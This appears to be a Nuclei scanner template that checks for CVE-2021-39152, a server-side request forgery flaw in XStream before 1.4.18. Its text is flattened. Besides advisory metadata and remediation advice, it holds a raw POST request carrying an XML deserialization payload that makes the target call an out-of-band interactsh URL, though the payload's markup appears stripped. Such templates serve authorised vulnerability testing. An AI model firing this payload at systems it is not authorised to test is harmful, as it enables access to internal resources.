id: CVE-2021-39152 info: name: XStream <1.4.18 - Server-Side Request Forgery author: pwnhxl severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: - https://x-stream.github.io/CVE-2021-39152.html - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2 - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39152 - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 epss-percentile: 0.85465 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve2021,cve,xstream,ssrf,oast,xstream_project http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml http://{{interactsh-url}}/internal/ GBK 1111 b 0 0 http://{{interactsh-url}}/internal/ 1111 b 0 0 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 490a004630440220514bbbb54cfb14f5553275a4d456acaa6d46f68655cf3f130777cd445e45f90702204e530c6940ec5efdc46b19a6029292334ce0c0598fdc86d33b4b6f4fbd4b9541:922c64590222798bb761d5b6d8e72950